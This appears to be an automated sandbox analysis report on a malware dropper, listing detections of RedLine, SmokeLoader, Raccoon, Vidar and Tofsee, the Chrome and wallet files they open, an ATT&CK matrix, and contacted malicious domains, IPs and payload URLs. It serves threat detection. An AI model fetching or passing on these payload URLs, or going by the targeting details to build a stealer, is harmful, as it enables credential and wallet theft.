Source: 8EC4.exe, 00000028.00000002.1005269358.0000000002CD8000.00000004.00000001.sdmp	String found in binary or memory: cjelfplplebdjjenllpjcblmjkfcffne\|JaxxxLiberty
Source: 8EC4.exe, 00000028.00000002.1019624757.0000000002D58000.00000004.00000001.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	String found in binary or memory: ExodusE#
Source: 8EC4.exe, 00000028.00000002.1019624757.0000000002D58000.00000004.00000001.sdmp	String found in binary or memory: l5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
Source: 8EC4.exe	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\AppData\Local\Temp\7801.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\AppData\Local\Temp\7801.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\7801.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Source: Yara match	File source: 00000014.00000002.775878501.0000000000622000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 8EC4.exe PID: 6240, type: MEMORYSTR

Remote Access Functionality:

Yara detected RedLine Stealer

Show sources

Source: Yara match	File source: 40.0.8EC4.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.0.8EC4.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.0.8EC4.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.8EC4.exe.451f910.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.8EC4.exe.451f910.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.0.8EC4.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.8EC4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.0.8EC4.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000028.00000002.923336327.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.828481056.0000000004401000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000000.820733997.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000000.819245011.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000000.820186557.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000000.819693926.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected SmokeLoader

Show sources

Source: Yara match	File source: 11.2.uufaeea.4615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.E666.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.U3E7zMaux2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.0.E666.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.0.E666.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.U3E7zMaux2.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.U3E7zMaux2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.1.E666.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.U3E7zMaux2.exe.5315a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.U3E7zMaux2.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.0.E666.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.1.uufaeea.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.E666.exe.5415a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.U3E7zMaux2.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.uufaeea.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000002.784101177.00000000006A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.700489251.00000000044E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.713149753.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.783879616.0000000000530000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.713456716.0000000002301000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.766896131.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.766831607.00000000004F0000.00000004.00000001.sdmp, type: MEMORY

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: 43.2.7801.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.2.7801.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.3.7801.exe.4e00000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.3.7801.exe.4e00000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002B.00000003.856737411.0000000004E00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000002.922477314.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 7801.exe PID: 7032, type: MEMORYSTR

Yara detected Vidar stealer

Show sources

Source: Yara match

File source: 00000014.00000002.775878501.0000000000622000.00000004.00000020.sdmp, type: MEMORY

Yara detected Tofsee

Show sources

Source: Yara match	File source: 21.2.86C4.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.lagavljy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.86C4.exe.540e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.svchost.exe.320000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.lagavljy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.lagavljy.exe.650000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.lagavljy.exe.650000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.lagavljy.exe.490000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.svchost.exe.320000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.86C4.exe.560000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.86C4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.lagavljy.exe.470e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.797378726.0000000000540000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.807575070.0000000000650000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.780018628.0000000000560000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.803811514.0000000000490000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 86C4.exe PID: 1368, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lagavljy.exe PID: 4544, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 5940, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\86C4.exe	Code function: 21_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,	21_2_004088B0
Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exe	Code function: 36_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,	36_2_004088B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 39_2_003288B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,	39_2_003288B0

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts1	Scripting1	DLL Side-Loading1	DLL Side-Loading1	Disable or Modify Tools211	OS Credential Dumping1	System Time Discovery2	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer15	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API541	Valid Accounts1	Valid Accounts1	Deobfuscate/Decode Files or Information11	Input Capture1	Account Discovery1	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Encrypted Channel22	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution1	Windows Service14	Access Token Manipulation1	Scripting1	Security Account Manager	File and Directory Discovery3	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Command and Scripting Interpreter3	Logon Script (Mac)	Windows Service14	Obfuscated Files or Information3	NTDS	System Information Discovery228	Distributed Component Object Model	Input Capture1	Scheduled Transfer	Non-Application Layer Protocol5	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Service Execution3	Network Logon Script	Process Injection713	Software Packing33	LSA Secrets	Security Software Discovery541	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol36	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Timestomp1	Cached Domain Credentials	Process Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	DLL Side-Loading1	DCSync	Virtualization/Sandbox Evasion331	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	File Deletion1	Proc Filesystem	Application Window Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading131	/etc/passwd and /etc/shadow	System Owner/User Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Valid Accounts1	Network Sniffing	Remote System Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Access Token Manipulation1	Input Capture	System Network Configuration Discovery1	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop
Compromise Software Supply Chain	Unix Shell	Launchd	Launchd	Virtualization/Sandbox Evasion331	Keylogging	Local Groups	Component Object Model and Distributed COM	Screen Capture	Exfiltration over USB	DNS			Inhibit System Recovery
Compromise Hardware Supply Chain	Visual Basic	Scheduled Task	Scheduled Task	Process Injection713	GUI Input Capture	Domain Groups	Exploitation of Remote Services	Email Collection	Commonly Used Port	Proxy			Defacement
Trusted Relationship	Python	Hypervisor	Process Injection	Hidden Files and Directories1	Web Portal Capture	Cloud Groups	Attack PC via USB Connection	Local Email Collection	Standard Application Layer Protocol	Internal Proxy			Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
U3E7zMaux2.exe	41%	Virustotal		Browse
U3E7zMaux2.exe	46%	ReversingLabs	Win32.Trojan.CrypterX
U3E7zMaux2.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\8EC4.exe	100%	Avira	HEUR/AGEN.1211353
C:\Users\user\AppData\Local\Temp\7801.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\8EC4.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\8ED5.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\9A02.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\86C4.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\7CA1.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\LocalLow\sG8rM8v\AccessibleHandler.dll	0%	Metadefender		Browse
C:\Users\user\AppData\LocalLow\sG8rM8v\AccessibleHandler.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\sG8rM8v\AccessibleMarshal.dll	0%	Metadefender		Browse
C:\Users\user\AppData\LocalLow\sG8rM8v\AccessibleMarshal.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\sG8rM8v\IA2Marshal.dll	3%	Metadefender		Browse
C:\Users\user\AppData\LocalLow\sG8rM8v\IA2Marshal.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\sG8rM8v\MapiProxy.dll	0%	Metadefender		Browse
C:\Users\user\AppData\LocalLow\sG8rM8v\MapiProxy.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\sG8rM8v\breakpadinjector.dll	0%	Metadefender		Browse
C:\Users\user\AppData\LocalLow\sG8rM8v\breakpadinjector.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\sG8rM8v\freebl3.dll	0%	Metadefender		Browse
C:\Users\user\AppData\LocalLow\sG8rM8v\freebl3.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\sG8rM8v\ldap60.dll	0%	Metadefender		Browse
C:\Users\user\AppData\LocalLow\sG8rM8v\ldap60.dll	2%	ReversingLabs
C:\Users\user\AppData\LocalLow\sG8rM8v\ldif60.dll	0%	Metadefender		Browse
C:\Users\user\AppData\LocalLow\sG8rM8v\ldif60.dll	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
40.0.8EC4.exe.400000.10.unpack	100%	Avira	HEUR/AGEN.1145065	Download File
43.3.7801.exe.4d60000.2.unpack	100%	Avira	TR/Crypt.EPACK.Gen2	Download File
14.0.D984.exe.620e50.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
43.2.7801.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1127993	Download File
40.0.8EC4.exe.610000.0.unpack	100%	Avira	HEUR/AGEN.1211353	Download File
21.2.86C4.exe.540e50.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
14.0.D984.exe.400000.6.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
22.0.8EC4.exe.fa0000.2.unpack	100%	Avira	HEUR/AGEN.1211353	Download File
40.0.8EC4.exe.400000.6.unpack	100%	Avira	HEUR/AGEN.1145065	Download File
19.2.E666.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
40.0.8EC4.exe.400000.8.unpack	100%	Avira	HEUR/AGEN.1145065	Download File
21.3.86C4.exe.560000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
40.0.8EC4.exe.610000.9.unpack	100%	Avira	HEUR/AGEN.1211353	Download File
12.0.uufaeea.400000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.2.U3E7zMaux2.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
40.2.8EC4.exe.610000.1.unpack	100%	Avira	HEUR/AGEN.1211353	Download File
19.0.E666.exe.400000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
22.2.8EC4.exe.fa0000.0.unpack	100%	Avira	HEUR/AGEN.1211353	Download File
36.2.lagavljy.exe.400000.0.unpack	100%	Avira	BDS/Backdoor.Gen	Download File
14.2.D984.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
19.0.E666.exe.400000.6.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
40.0.8EC4.exe.610000.2.unpack	100%	Avira	HEUR/AGEN.1211353	Download File
1.0.U3E7zMaux2.exe.400000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
20.2.7CA1.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
12.0.uufaeea.400000.6.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
40.0.8EC4.exe.610000.3.unpack	100%	Avira	HEUR/AGEN.1211353	Download File
22.0.8EC4.exe.fa0000.3.unpack	100%	Avira	HEUR/AGEN.1211353	Download File
1.1.U3E7zMaux2.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
40.0.8EC4.exe.610000.11.unpack	100%	Avira	HEUR/AGEN.1211353	Download File
19.1.E666.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
14.3.D984.exe.630000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
17.2.E666.exe.5415a0.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
20.2.7CA1.exe.570e50.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
14.0.D984.exe.400000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
40.0.8EC4.exe.610000.7.unpack	100%	Avira	HEUR/AGEN.1211353	Download File
19.0.E666.exe.400000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.0.U3E7zMaux2.exe.400000.6.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
22.0.8EC4.exe.fa0000.1.unpack	100%	Avira	HEUR/AGEN.1211353	Download File
36.3.lagavljy.exe.490000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
36.2.lagavljy.exe.650000.2.unpack	100%	Avira	BDS/Backdoor.Gen	Download File
14.2.D984.exe.620e50.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
40.0.8EC4.exe.610000.5.unpack	100%	Avira	HEUR/AGEN.1211353	Download File
40.0.8EC4.exe.400000.4.unpack	100%	Avira	HEUR/AGEN.1145065	Download File
12.1.uufaeea.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
40.2.8EC4.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1145065	Download File
39.2.svchost.exe.320000.0.unpack	100%	Avira	BDS/Backdoor.Gen	Download File
40.0.8EC4.exe.610000.1.unpack	100%	Avira	HEUR/AGEN.1211353	Download File
22.0.8EC4.exe.fa0000.0.unpack	100%	Avira	HEUR/AGEN.1211353	Download File
11.2.uufaeea.4615a0.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
21.2.86C4.exe.400000.0.unpack	100%	Avira	BDS/Backdoor.Gen	Download File
40.0.8EC4.exe.400000.12.unpack	100%	Avira	HEUR/AGEN.1145065	Download File
0.2.U3E7zMaux2.exe.5315a0.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
12.0.uufaeea.400000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
40.0.8EC4.exe.610000.13.unpack	100%	Avira	HEUR/AGEN.1211353	Download File
14.0.D984.exe.620e50.7.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
36.2.lagavljy.exe.470e50.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
20.3.7CA1.exe.590000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
1.0.U3E7zMaux2.exe.400000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
12.2.uufaeea.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://tempuri.org/Entity/Id12Response	0%	URL Reputation	safe
http://185.7.214.171:8080/6.php	100%	URL Reputation	malware
http://tempuri.org/	0%	URL Reputation	safe
http://tempuri.org/Entity/Id2Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id21Response	0%	URL Reputation	safe
http://185.215.113.35/d2VxjasuwS/index.php?scr=1	13%	Virustotal		Browse
http://185.215.113.35/d2VxjasuwS/index.php?scr=1	0%	Avira URL Cloud	safe
http://185.163.204.24/	4%	Virustotal		Browse
http://185.163.204.24/	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id15Response	0%	URL Reputation	safe
https://api.ip.sb/ip	0%	URL Reputation	safe
http://tempuri.org/Entity/Id24Response	0%	URL Reputation	safe
http://data-host-coin-8.com/files/9030_1641816409_7037.exe	16%	Virustotal		Browse
http://data-host-coin-8.com/files/9030_1641816409_7037.exe	100%	Avira URL Cloud	malware
http://tempuri.org/Entity/Id5Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id10Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id8Response	0%	URL Reputation	safe
http://data-host-coin-8.com/game.exe	0%	URL Reputation	safe
http://tempuri.org/Entity/Id13Response	0%	URL Reputation	safe
http://185.163.204.24//l/f/S2zKVH4BZ2GIX1a3NFPE/870316542b6e8d6795384509412b3780ad4b1d32	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id22Response	0%	URL Reputation	safe
https://www.tiktok.com/legal/report/feedback	0%	URL Reputation	safe
https://get.adob	0%	URL Reputation	safe
http://tempuri.org/Entity/Id18Response	0%	URL Reputation	safe
http://185.215.113.35/d2VxjasuwS/plugins/cred.dll	100%	Avira URL Cloud	malware
https://disneyplus.com/legal.	0%	URL Reputation	safe
http://tempuri.org/Entity/Id3Response	0%	URL Reputation	safe
http://service.r	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
pool-fr.supportxmr.com	91.121.140.167	true	false	high
unicupload.top	54.38.220.85	true	false	high
host-data-coin-11.com	93.189.42.167	true	false	high
patmushta.info	8.209.67.104	true	false	high
cdn.discordapp.com	162.159.130.233	true	false	high
privacy-tools-for-you-780.com	93.189.42.167	true	false	high
microsoft-com.mail.protection.outlook.com	40.93.212.0	true	false	high
goo.su	104.21.38.221	true	false	high
transfer.sh	144.76.136.153	true	false	high
a0621298.xsph.ru	141.8.194.74	true	false	high
data-host-coin-8.com	93.189.42.167	true	false	high
pool.supportxmr.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.7.214.171:8080/6.php	true	URL Reputation: malware	unknown
http://185.215.113.35/d2VxjasuwS/index.php?scr=1	true	13%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.163.204.24/	true	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://a0621298.xsph.ru/advert.msi	false		high
http://a0621298.xsph.ru/9.exe	false		high
http://data-host-coin-8.com/files/9030_1641816409_7037.exe	true	16%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://a0621298.xsph.ru/45512.exe	false		high
http://data-host-coin-8.com/game.exe	false	URL Reputation: safe	unknown
http://a0621298.xsph.ru/File.exe	false		high
http://a0621298.xsph.ru/443.exe	false		high
http://185.163.204.24//l/f/S2zKVH4BZ2GIX1a3NFPE/870316542b6e8d6795384509412b3780ad4b1d32	true	Avira URL Cloud: safe	unknown
http://185.215.113.35/d2VxjasuwS/plugins/cred.dll	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text	8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/sc/sct	8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	false		high
https://duckduckgo.com/chrome_newtab	8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1005269358.0000000002CD8000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1002161334.0000000002CC2000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.976992957.0000000002C00000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk	8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	false		high
https://duckduckgo.com/ac/?q=	8EC4.exe, 00000028.00000002.1005269358.0000000002CD8000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1002161334.0000000002CC2000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.976992957.0000000002C00000.00000004.00000001.sdmp	false		high
http://tempuri.org/Entity/Id12Response	8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/	8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id2Response	8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1	8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	false		high
http://tempuri.org/Entity/Id21Response	8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap	8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID	8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret	8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	false		high
https://support.google.com/chrome/?p=plugin_real	8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue	8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted	8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault	8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat	8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	false		high
http://tempuri.org/Entity/Id15Response	8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew	8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register	8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey	8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	false		high
https://api.ip.sb/ip	8EC4.exe, 00000016.00000002.828481056.0000000004401000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.923336327.0000000000402000.00000040.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel	8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp	false		high
